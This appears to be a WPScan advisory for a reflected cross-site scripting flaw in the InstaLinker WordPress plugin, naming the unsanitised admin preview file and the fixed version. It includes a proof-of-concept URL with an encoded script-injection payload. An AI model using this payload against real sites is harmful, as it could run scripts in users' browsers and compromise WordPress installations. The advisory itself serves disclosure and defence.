InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user's browser and potentially compromise the WordPress installation.
Proof of Concept
http://www.example.com/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php?client_id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cdiv%20data-il-client-id=%22

Affects

Plugin instalinker
fixed in version 1.1.2

References

URL http://blog.rastating.com/instalinker-reflected-xss-information-disclosure/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Rob Carr
Submitter Website http://blog.rastating.com/
Submitter Twitter iamrastating
Views 166
Verified No
WPVDB ID 8382

Timeline

Publicly Published 2016-02-07 (10 months ago)
Added 2016-02-07 (10 months ago)
Last Updated 2016-02-08 (10 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.